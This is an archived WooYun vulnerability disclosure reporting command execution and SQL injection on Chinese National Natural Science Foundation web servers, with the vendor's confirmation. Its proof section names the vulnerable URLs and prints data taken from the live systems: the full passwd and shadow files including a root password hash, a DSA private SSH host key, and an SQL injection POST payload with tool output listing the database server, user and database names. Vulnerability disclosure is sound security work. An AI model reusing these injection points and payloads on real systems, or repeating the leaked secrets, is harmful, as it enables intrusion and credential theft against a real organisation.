当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046708

漏洞标题:国家自然科学基金委员会 命令执行及SQL注入各一枚

相关厂商:国家自然科学基金委员会

漏洞作者: 雅柏菲卡

提交时间:2013-12-23 16:29

修复时间:2014-02-06 16:30

公开时间:2014-02-06 16:30

漏洞类型:命令执行

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-23: 细节已通知厂商并且等待厂商处理中
2013-12-27: 厂商已经确认,细节仅向厂商公开
2014-01-06: 细节向核心白帽子及相关领域专家公开
2014-01-16: 细节向普通白帽子公开
2014-01-26: 细节向实习白帽子公开
2014-02-06: 细节向公众公开

简要描述:

......

详细说明:

............

漏洞证明:

http://npd.nsfc.gov.cn/OutComeSearch!searchAllOutComeById.action?typeId=010&id=
执行点如上 以下为详细数据
网站物理路径: /root/apache-tomcat-6.0.35/webapps/NSFC_Project
java.home: /usr/java/jdk1.6.0_38/jre
java.version: 1.6.0_38
os.name: Linux
os.arch: amd64
os.version: 2.6.18-308.el5
user.name: root
user.home: /root
user.dir: /root/apache-tomcat-6.0.35/bin
java.class.version: 50.0
java.class.path: /root/apache-tomcat-6.0.35/bin/bootstrap.jar
java.library.path: /usr/java/jdk1.6.0_38/jre/lib/amd64/server:/usr/java/jdk1.6.0_38/jre/lib/amd64:/usr/java/jdk1.6.0_38/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 20.13-b02
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) 64-Bit Server VM
java.specification.version: 1.6
java.specification.vender:
java.specification.name: Java Platform API Specification
java.io.tmpdir: /root/apache-tomcat-6.0.35/temp
hibernate信息
可以下载passwd文件
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
shadow文件
root:$1$nje5zcM6$qCDlPohxW9rXVF2Hr.K2G0:15713:0:99999:7:::
bin:*:15713:0:99999:7:::
daemon:*:15713:0:99999:7:::
adm:*:15713:0:99999:7:::
lp:*:15713:0:99999:7:::
sync:*:15713:0:99999:7:::
shutdown:*:15713:0:99999:7:::
halt:*:15713:0:99999:7:::
mail:*:15713:0:99999:7:::
news:*:15713:0:99999:7:::
uucp:*:15713:0:99999:7:::
operator:*:15713:0:99999:7:::
games:*:15713:0:99999:7:::
gopher:*:15713:0:99999:7:::
ftp:*:15713:0:99999:7:::
nobody:*:15713:0:99999:7:::
nscd:!!:15713:0:99999:7:::
vcsa:!!:15713:0:99999:7:::
pcap:!!:15713:0:99999:7:::
dbus:!!:15713:0:99999:7:::
rpc:!!:15713:0:99999:7:::
avahi:!!:15713:0:99999:7:::
mailnull:!!:15713:0:99999:7:::
smmsp:!!:15713:0:99999:7:::
sshd:!!:15713:0:99999:7:::
rpcuser:!!:15713:0:99999:7:::
nfsnobody:!!:15713:0:99999:7:::
xfs:!!:15713:0:99999:7:::
haldaemon:!!:15713:0:99999:7:::
avahi-autoipd:!!:15713:0:99999:7:::
mysql:!!:15713::::::
ssh_host_dsa_key
-----BEGIN DSA PRIVATE KEY-----
MIIBuwIBAAKBgQDnReip0ZBuqYfzbgfIo3sAfJq3KBTLVMV2XS8RECL53smQXHhj
ulfncDMLpsJ0FHzo/qqcWw0EY9hheDvatb33iYmoAKjM6MokE+AN60CQGHwcW+dH
1npYC6qrl5rMqaPTwxQ2SKTm6dcsOpOWR22apLPS5ACERfKp4V0LoO/0vwIVAIao
W+qAFr0vgFAVzfvTpjFjFXU3AoGBAM1px9b+1rvjSfCe+rGuBbfbnfYylfGOpAfF
0kLe2Ft9n47gd3zzRCpzxH3y3AV9xUsfrLXq4qwnzHN/o+xIG0GK9qX5SIGHwYar
YiqTir2ID2K+vQp8++1f8LvqAA15TydQ3RKsaHY2iC8dXWkuwIWgevBZQW0gi1th
OcrwT0wBAoGAEDHrIHZtZEfOXua792E28njJ814sh3xKE6ACa660j/Nrbur4utvY
97DLgRkLSekAqGbIv11/lME88cgooXLT29aVa0Hfer3mGe5zcNGDfn5dGtt7fvzJ
SLrBF2Rv35zyJdAvW3Md/d2bLtgeZgddk7o0LTaOgYhgl7QsfJTlBqwCFB9QiMrJ
Zym3DQe2sx9fast7ClDQ
-----END DSA PRIVATE KEY-----
nsfc.sql
/*
Navicat MySQL Data Transfer
Source Server : localhost_3306
Source Server Version : 50520
Source Host : localhost:3306
Source Database : nsfc
Target Server Type : MYSQL
Target Server Version : 50520
File Encoding : 65001
注射点 http://pub.nsfc.gov.cn/jjyw/ch/auditor/auditor_register.aspx
post data :
__VIEWSTATE=%2FwEPDwUKMTc1ODAwNzgxMA8W%2BAMeDnJlc3VtZV9kaXNwbGF5BQEwHhBwb3N0Y29kZV9kaXNwbGF5BQEwHhB6aGljaGVuZ19lbl9uYW1lBQVUaXRsZR4LdGVsX2NuX2hlbHBlHg5zZXFfbm9fZGlzcGxheQUBMB4QemhpY2hlbmdfY25faGVscGUeFHNtYWxsX21vYmlsZV9lbl9oZWxwZR4UY3JlZGl0X2xldmVsX2NuX2hlbHBlHgtleHQyX2xlbmd0aAUDMTAwHhB6aHVhbnllX3JlcXVpcmVkBQExHg96aHVhbnllX2Rpc3BsYXkFATAeEGtleV93b3JkX2NuX25hbWUFD%2BafpeivouWFs%2BmUruivjR4QaG9tZV90ZWxfZGlzcGxheQUBMB4QemhpY2hlbmdfY25fbmFtZQUG6IGM56ewHg14dWVsaV9jbl9uYW1lBQblrabljoYeEWxhc3RfbmFtZV9jbl9uYW1lBQlMYXN0IE5hbWUeEWhvbWVfdGVsX3JlcXVpcmVkBQEwHhJtaWRkbGVfbmFtZV9sZW5ndGgFAzEwMB4TbWlkZGxlX25hbWVfY25fbmFtZQULTWlkZGxlIE5hbWUeEGlkX2NhcmRfcmVxdWlyZWQFATAeEHBvc3Rjb2RlX2NuX2hlbHBlHhJmaXJzdF9uYW1lX2VuX25hbWUFCkZpcnN0IE5hbWUeD2lkX2NhcmRfZGlzcGxheQUBMB4MZXh0Ml9kaXNwbGF5BQEwHg9pZF9jYXJkX2NuX2hlbHBlHgtzZXhfY25fbmFtZQUG5oCn5YirHhl0ZWNobmljYWxfb2ZmaWNlc19lbl9oZWxwZR4Pemh1YW55ZV9lbl9oZWxwZR4ObW9iaWxlX2VuX25hbWUFBk1vYmlsZR4QcmVnaW9uX2lkX2xlbmd0aAUCNTAeEmZpcnN0X25hbWVfZW5faGVscGUeFHBpbl95aW5fbmFtZV9jbl9oZWxwZR4LdGVsX2VuX2hlbHBlHg1jaXR5X3JlcXVpcmVkBQEwHgxleHQyX2NuX25hbWUFDeaJqeWxleWtl%2BautTIeEXBhc3N3b3JkX3JlcXVpcmVkBQExHg5yZXN1bWVfZW5faGVscGUeEGFkdmFudGFnZV9sZW5ndGgFAzYwMB4RYmlydGhkYXlfcmVxdWlyZWQFATAeEXJlYWxfbmFtZV9lbl9oZWxwZR4RcmVnaW9uX2lkX2NuX2hlbHBlHhBrZXlfd29yZF9lbl9uYW1lBTvms6g65q2k5a2X5q615LuF5L6b5YaF6YOo5p%2Bl6K%2Bi55SoLOazqOWGjOeZu%2BiusOaXtuS4jemcgOimgR4MY2l0eV9jbl9uYW1lBQbln47luIIeFXNtYWxsX21vYmlsZV9yZXF1aXJlZAUBMB4Oc2VxX25vX2NuX25hbWUFCea1geawtOWPtx4ZdGVjaG5pY2FsX29mZmljZXNfY25faGVscGUeDnNlcV9ub19jbl9oZWxwZR4QaG9tZV90ZWxfZW5fbmFtZQUOSG9tZSBUZWxlcGhvbmUeFHNtYWxsX21vYmlsZV9jbl9oZWxwZR4OcmVzdW1lX2NuX25hbWUFDOS4quS6uuS7i%2Be7jR4Lc2V4X2NuX2hlbHBlHhF1c2VyX25hbWVfZW5fbmFtZQUJVXNlciBOYW1lHg96aHVhbnllX2VuX25hbWUFClNwZWNpYWxpdHkeE2NyZWRpdF9sZXZlbF9sZW5ndGgFATQeEWFkdmFudGFnZV9lbl9oZWxwZR4UcGluX3lpbl9uYW1lX2NuX25hbWUFDOaxieivreaLvOmfsx4RemhpY2hlbmdfcmVxdWlyZWQFATEeE21pZGRsZV9uYW1lX2VuX2hlbHBlHhBrZXlfd29yZF9lbl9oZWxwZR4SYXVkaXRfYXJlYV9kaXNwbGF5BQEwHg9tb2JpbGVfcmVxdWlyZWQFATAeDmVuX3VuaXRfbGVuZ3RoBQQyMDAwHg1lbWFpbF9jbl9oZWxwZR4Lc2V4X2Rpc3BsYXkFATEeEHBvc3Rjb2RlX2NuX25hbWUFBumCrue8lh4MZXh0Ml9lbl9uYW1lBQ3mianlsZXlrZfmrrUyHhB6aGljaGVuZ19kaXNwbGF5BQEwHhBwYXNzd29yZF9kaXNwbGF5BQExHhRzbWFsbF9tb2JpbGVfZW5fbmFtZQUVUGVyc29uYWwgQWNjZXNzIFBob25lHhBiaXJ0aGRheV9jbl9oZWxwZR4MY2l0eV9lbl9uYW1lBQVDaXR5IB4OaWRfY2FyZF9sZW5ndGgFAjMwHhJmaXJzdF9uYW1lX2NuX25hbWUFCkZpcnN0IE5hbWUeEHBvc3Rjb2RlX2VuX2hlbHBlHhBwb3N0Y29kZV9lbl9uYW1lBRBQb3N0Y29kZS9aaXBjb2RlHg1leHQyX3JlcXVpcmVkBQEwHg5lbWFpbF9yZXF1aXJlZAUBMR4QcmVhbF9uYW1lX2xlbmd0aAUCNTAeEXJlYWxfbmFtZV9jbl9oZWxwZR4PYWRkcmVzc19lbl9oZWxwZR4QYmlydGhkYXlfZW5faGVscGUeEmF1ZGl0X2FyZWFfZW5fbmFtZQUOUmVzZWFyY2ggRmllbGQeFHByb3ZpZW5jZV9pZF9lbl9uYW1lBQhQcm92aW5jZR4RbGFzdF9uYW1lX2Rpc3BsYXkFATAeEnVzZXJfbmFtZV9yZXF1aXJlZAUBMB4QcGFzc3dvcmRfZW5faGVscGUeFGNyZWRpdF9sZXZlbF9kaXNwbGF5BQEwHg9iaXJ0aGRheV9sZW5ndGgFATgeFHByb3ZpZW5jZV9pZF9kaXNwbGF5BQEwHgt0ZWxfZGlzcGxheQUBMB4QaG9tZV90ZWxfZW5faGVscGUeGnRlY2huaWNhbF9vZmZpY2VzX3JlcXVpcmVkBQEwHgxleHQxX2NuX2hlbHBlHgxleHQxX2VuX25hbWUFDeaJqeWxleWtl%2BautTEeFHBpbl95aW5fbmFtZV9lbl9oZWxwZR4NZW1haWxfZW5faGVscGUeDnJlc3VtZV9jbl9oZWxwZR4RcmVnaW9uX2lkX2NuX25hbWUFDeWbveWutlzlnLDljLoeEXJlZ2lvbl9pZF9lbl9uYW1lBQdDb3VudHJ5Hg9lbl91bml0X2VuX25hbWUFF0luc3RpdHV0aW9uKGluIEVuZ2xpc2gpHhBob21lX3RlbF9jbl9oZWxwZR4UcHJvdmllbmNlX2lkX2VuX2hlbHBlHgpmYXhfbGVuZ3RoBQI1MB4VcGluX3lpbl9uYW1lX3JlcXVpcmVkBQEwHhRwcm92aWVuY2VfaWRfY25fbmFtZQUG55yB5Lu9Hg1lbWFpbF9kaXNwbGF5BQExHgxleHQyX2NuX2hlbHBlHgtmYXhfZGlzcGxheQUBMB4MY2l0eV9jbl9oZWxwZR4PYWRkcmVzc19jbl9oZWxwZR4RYXVkaXRfYXJlYV9sZW5ndGgFAzgwMB4UcGluX3lpbl9uYW1lX2VuX25hbWUFDEVuZ2xpc2ggTmFtZR4RcmVhbF9uYW1lX2NuX25hbWUFBuWnk%2BWQjR4TZGVwYXJ0bWVudF9yZXF1aXJlZAUBMB4RbGFzdF9uYW1lX2VuX2hlbHBlHg14dWVsaV9jbl9oZWxwZR4KdGVsX2xlbmd0aAUDMjAwHhFrZXlfd29yZF9yZXF1aXJlZAUBMB4PYWRkcmVzc19kaXNwbGF5BQEwHg9pZF9jYXJkX2VuX25hbWUFB0lEIENhcmQeEHBhc3N3b3JkX2VuX25hbWUFCFBhc3N3b3JkHhFmaXJzdF9uYW1lX2xlbmd0aAUDMTAwHhJhdWRpdF9hcmVhX2NuX2hlbHBlHhRwcm92aWVuY2VfaWRfY25faGVscGUeE21pZGRsZV9uYW1lX2Rpc3BsYXkFATAeC3NleF9lbl9uYW1lBQZHZW5kZXIeC3RlbF9jbl9uYW1lBQ%2Flip7lhazlrqTnlLXor50eD2FkZHJlc3NfZW5fbmFtZQUOUG9zdGFsIEFkZHJlc3MeDm1vYmlsZV9lbl9oZWxwZR4PaWRfY2FyZF9jbl9uYW1lBQzouqvku73or4Hlj7ceD2VuX3VuaXRfY25fbmFtZQUP5Y2V5L2N6Iux5paH5ZCNHg5tb2JpbGVfZGlzcGxheQUBMB4LdW5pdF9sZW5ndGgFBDIwMDAeD2lkX2NhcmRfZW5faGVscGUeEWxhc3RfbmFtZV9lbl9uYW1lBQlMYXN0IE5hbWUeCnNleF9sZW5ndGgFATQeE3NtYWxsX21vYmlsZV9sZW5ndGgFAjE1HhFhZHZhbnRhZ2VfY25faGVscGUeEHBhc3N3b3JkX2NuX25hbWUFBuWvhueggR4Mc2V4X3JlcXVpcmVkBQEwHg1zZXFfbm9fbGVuZ3RoBQIxNR4NZW1haWxfY25fbmFtZQUGRS1tYWlsHgtzZXhfZW5faGVscGUeEmZpcnN0X25hbWVfZGlzcGxheQUBMB4RcmVnaW9uX2lkX2VuX2hlbHBlHg1lbWFpbF9lbl9uYW1lBQZFLW1haWweE21pZGRsZV9uYW1lX2NuX2hlbHBlHhVjcmVkaXRfbGV2ZWxfcmVxdWlyZWQFATAeDGNpdHlfZW5faGVscGUeD3Bvc3Rjb2RlX2xlbmd0aAUCMTUeC2ZheF9jbl9uYW1lBQbkvKDnnJ8eDXh1ZWxpX2VuX2hlbHBlHgt0ZWxfZW5fbmFtZQUQT2ZmaWNlIFRlbGVwaG9uZR4PYWRkcmVzc19jbl9uYW1lBQzpgJrkv6HlnLDlnYAeEXJlYWxfbmFtZV9lbl9uYW1lBQlSZWFsIE5hbWUeD3NlcV9ub19yZXF1aXJlZAUBMR4QaG9tZV90ZWxfY25fbmFtZQUM5L2P5a6F55S16K%2BdHhNwaW5feWluX25hbWVfbGVuZ3RoBQMxNTAeEmRlcGFydG1lbnRfZW5fbmFtZQUKRGVwYXJ0bWVudB4MZXh0MV9jbl9uYW1lBQ3mianlsZXlrZfmrrUxHhFhZHZhbnRhZ2VfZGlzcGxheQUBMB4ZdGVjaG5pY2FsX29mZmljZXNfZGlzcGxheQUBMB4QYWRkcmVzc19yZXF1aXJlZAUBMR4OcmVzdW1lX2VuX25hbWUFBlJlc3VtZR4RdXNlcl9uYW1lX2NuX25hbWUFCeeUqOaIt%2BWQjR4NbW9iaWxlX2xlbmd0aAUCMTUeFGNyZWRpdF9sZXZlbF9jbl9uYW1lBQnkv6HoqonluqYeFXByb3ZpZW5jZV9pZF9yZXF1aXJlZAUBMB4LZmF4X2NuX2hlbHBlHhNmaXJzdF9uYW1lX3JlcXVpcmVkBQEwHhFhZHZhbnRhZ2VfZW5fbmFtZQUOUGxlYXNlIGRlbm90ZToeD3poaWNoZW5nX2xlbmd0aAUDNTAwHhFwb3N0Y29kZV9yZXF1aXJlZAUBMR4TcHJvdmllbmNlX2lkX2xlbmd0aAUCNTAeD2VuX3VuaXRfZW5faGVscGUeDWV4dDFfcmVxdWlyZWQFATAeFHNtYWxsX21vYmlsZV9jbl9uYW1lBQnlsI%2FngbXpgJoeEXJlZ2lvbl9pZF9kaXNwbGF5BQEwHhF1c2VyX25hbWVfY25faGVscGUeFGNyZWRpdF9sZXZlbF9lbl9uYW1lBTvms6g65q2k5a2X5q615LuF5L6b5YaF6YOo5p%2Bl6K%2Bi55SoLOazqOWGjOeZu%2BiusOaXtuS4jemcgOimgR4OeHVlbGlfcmVxdWlyZWQFATAeEGVuX3VuaXRfcmVxdWlyZWQFATAeDXJlc3VtZV9sZW5ndGgFAjE2HhNtaWRkbGVfbmFtZV9lbl9uYW1lBQtNaWRkbGUgTmFtZR4ZdGVjaG5pY2FsX29mZmljZXNfY25fbmFtZQUG56eR5a6kHhRzbWFsbF9tb2JpbGVfZGlzcGxheQUBMB4PZW5fdW5pdF9kaXNwbGF5BQEwHgx1bml0X2Rpc3BsYXkFATAeDXh1ZWxpX2Rpc3BsYXkFATAeEGtleV93b3JkX2NuX2hlbHBlHg9rZXlfd29yZF9sZW5ndGgFAzUwMB4SbGFzdF9uYW1lX3JlcXVpcmVkBQEwHg96aHVhbnllX2NuX2hlbHBlHhFkZXBhcnRtZW50X2xlbmd0aAUCNTAeGHRlY2huaWNhbF9vZmZpY2VzX2xlbmd0aAUDMzAwHgxleHQxX2VuX2hlbHBlHhJhdWRpdF9hcmVhX2NuX25hbWUFDOWuoeeov%2BmihuWfnx4UY3JlZGl0X2xldmVsX2VuX2hlbHBlHhJkZXBhcnRtZW50X2NuX2hlbHBlHhRtaWRkbGVfbmFtZV9yZXF1aXJlZAUBMB4MdGVsX3JlcXVpcmVkBQExHg9lbl91bml0X2NuX2hlbHBlHhJkZXBhcnRtZW50X2NuX25hbWUFBumDqOmXqB4TYXVkaXRfYXJlYV9yZXF1aXJlZAUBMR4Pemh1YW55ZV9jbl9uYW1lBQbkuJPkuJoeDXh1ZWxpX2VuX25hbWUFCUVkdWNhdGlvbh4MY2l0eV9kaXNwbGF5BQEwHhJkZXBhcnRtZW50X2VuX2hlbHBlHhFyZWFsX25hbWVfZGlzcGxheQUBMR4SZGVwYXJ0bWVudF9kaXNwbGF5BQEwHgtmYXhfZW5fbmFtZQUDRmF4HgxleHQyX2VuX2hlbHBlHhF1c2VyX25hbWVfZW5faGVscGUeEHVzZXJfbmFtZV9sZW5ndGgFAjE1Hgx1bml0X2VuX25hbWUFC0luc3RpdHV0aW9uHgx4dWVsaV9sZW5ndGgFAjIwHhBwYXNzd29yZF9jbl9oZWxwZR4Qa2V5X3dvcmRfZGlzcGxheQUBMB4PcGFzc3dvcmRfbGVuZ3RoBQIxNR4QemhpY2hlbmdfZW5faGVscGUeDGV4dDFfZGlzcGxheQUBMB4ScmVhbF9uYW1lX3JlcXVpcmVkBQEwHhRwaW5feWluX25hbWVfZGlzcGxheQUBMB4MdW5pdF9jbl9uYW1lBQbljZXkvY0eGXRlY2huaWNhbF9vZmZpY2VzX2VuX25hbWUFEVRlY2huaWNhbCBPZmZpY2VzHgtjaXR5X2xlbmd0aAUCNTAeEGJpcnRoZGF5X2Rpc3BsYXkFATAeC2V4dDFfbGVuZ3RoBQMxMDAeC2ZheF9lbl9oZWxwZR4QYmlydGhkYXlfY25fbmFtZQUM5Ye655Sf5bm05pyIHg9yZXN1bWVfcmVxdWlyZWQFATAeEWFkdmFudGFnZV9jbl9uYW1lBQzkuJPkuJrnibnplb8eDGVtYWlsX2xlbmd0aAUCNTAeDHVuaXRfZW5faGVscGUeDm1vYmlsZV9jbl9uYW1lBQbmiYvmnLoeEmZpcnN0X25hbWVfY25faGVscGUeEXVzZXJfbmFtZV9kaXNwbGF5BQEwHg5tb2JpbGVfY25faGVscGUeEGxhc3RfbmFtZV9sZW5ndGgFAzEwMB4QYmlydGhkYXlfZW5fbmFtZQUIQmlydGhkYXkeDmFkZHJlc3NfbGVuZ3RoBQM1MDAeEmFkdmFudGFnZV9yZXF1aXJlZAUBMR4Oemh1YW55ZV9sZW5ndGgFAzUwMB4NdW5pdF9yZXF1aXJlZAUBMR4SYXVkaXRfYXJlYV9lbl9oZWxwZR4RbGFzdF9uYW1lX2NuX2hlbHBlHg9ob21lX3RlbF9sZW5ndGgFAjE1Hgx1bml0X2NuX2hlbHBlHg5zZXFfbm9fZW5fbmFtZQVI5rOoOua1geawtOWPt%2BeUseezu%2Be7n%2BiHquWKqOeUn%2BaIkCzkvpvmn6Xor6LnlKgs5rOo5YaM55m76K6w5pe25LiN6ZyA6KaBHg5zZXFfbm9fZW5faGVscGUeDGZheF9yZXF1aXJlZAUBMB4ScmVnaW9uX2lkX3JlcXVpcmVkBQEwFgRmDw8WAh4EVGV4dGVkZAIBD2QWQgIBDw8WAh4JTWF4TGVuZ3RoAg9kZAICDw8WAh%2F9AjIWBB4DVGlwBSFFLW1haWzkuI3mmK%2FmoIflh4bnmoRFbWFpbOagvOW8jyEeBXVzYWdlBQVlbWFpbGQCAw8PFgIf%2FQIPFgQf%2FgUZ5a%2BG56CB5b%2BF6aG75YWt5L2N5Lul5LiKLh4DRXhwBQZcU3s2LH1kAgUPD2QWBB%2F%2BBSLkuKTmrKHovpPlhaXnmoTlr4bnoIHkuI3kuIDoh7TvvIEuHwAFFFR3b1Bhc3N3b3JkQ29tcGFyZSgpZAIGDw8WAh%2F9AmRkZAIHDw8WAh%2F9AmRkZAIIDw8WAh%2F9AmRkZAIJDw8WAh%2F9AjJkZAIKDw8WAh%2F9ApYBZGQCCw8QZBAVAwzor7fpgInmi6kuLi4D55S3A%2BWlsxUDAAPnlLcD5aWzFCsDA2dnZ2RkAg4PDxYCH%2F0CCGRkAg8PDxYCH%2F0CMmRkAhAPDxYCH%2F0CMmRkAhEPDxYCH%2F0CMmRkAhIPDxYCH%2F0CMmRkAhMPDxYCH%2F0C0A8WBB%2F%2BBRPljZXkvY3kuI3og73kuLrnqbohHwAFCG5vdGVtcHR5ZAIUDw8WAh%2F9AtAPZGQCFQ8PFgIf%2FQL0AxYEH%2F4FGemAmuS%2FoeWcsOWdgOS4jeiDveS4uuepuiEfAAUIbm90ZW1wdHlkAhcPDxYCH%2F0CDxYEH%2F4FE%2BmCrue8luS4jeiDveS4uuepuiEfAAUHemlwY29kZWQCGA8QZBAVBwzor7fpgInmi6kuLi4G5Y2a5aOrCeWNmuWjq%2BeUnwbnoZXlo6sJ56GV5aOr55SfBuacrOenkQblhbblroMVBwAG5Y2a5aOrCeWNmuWjq%2BeUnwbnoZXlo6sJ56GV5aOr55SfBuacrOenkQblhbblroMUKwMHZ2dnZ2dnZ2RkAhkPDxYCH%2F0C9AMWBB%2F%2BBRPogYznp7DkuI3og73kuLrnqbohHwAFCG5vdGVtcHR5ZAIbDw8WAh%2F9AvQDFgQf%2FgUT5LiT5Lia5LiN6IO95Li656m6IR8ABQhub3RlbXB0eWQCHQ8QDxYCHgtfIURhdGFCb3VuZGdkEBUAFQAUKwMAZGQCHw8PFgIf%2FQKgBhYEH%2F4FGeWuoeeov%2BmihuWfn%2BS4jeiDveS4uuepuiEfAAUIbm90ZW1wdHlkAiAPDxYCH%2F0CyAEWBB%2F%2BBRzlip7lhazlrqTnlLXor53kuI3og73kuLrnqbohHwAFCG5vdGVtcHR5ZAIhDw8WAh%2F9Ag9kZAIiDw8WAh%2F9Ag9kZAIjDw8WAh%2F9Ag9kZAIkDw8WAh%2F9AjJkZAIlDw8WAh%2F9Ah5kZAImDw8WAh%2F9AmRkZAInDw8WAh%2F9AmRkZAIoDw8WAh%2F9AhBkZGRV3o3%2BgxIAFfG2UJpYrs8vO5mE2w%3D%3D&Email=test@test.com&Password=%27%27%27%27%27%27%27&Repassword=%27%27%27%27%27%27%27&RealName=%27&Sex=%C4%D0&Register=%D7%A2+%B2%E1
Target: http://pub.nsfc.gov.cn/jjyw/ch/auditor/auditor_register.aspx
DB Server: MsSQL with error
Resp. Time(avg): 431 ms
Current User: dbo
Sql Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Current DB: pins_main
System User: sa
Host Name: SERVER
Server Name: SERVER
master
tempdb
model
msdb
pubs
Northwind
fund_journal
jb_journal
jjyw_journal
pins_cn_journal
pins_en_journal
pins_main
qkjl_journal
sfic_cn_journal
sfic_en_journal
tpxw_journal

修复方案:

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-12-27 20:54

厂商回复:

CNVD确认并复现所述情况,转由CNCERT上报国家某信息安全协调机构,由其后续协调网站管理单位处置。按多个漏洞进行评分,rank 15

最新状态:

暂无


漏洞评价:

评论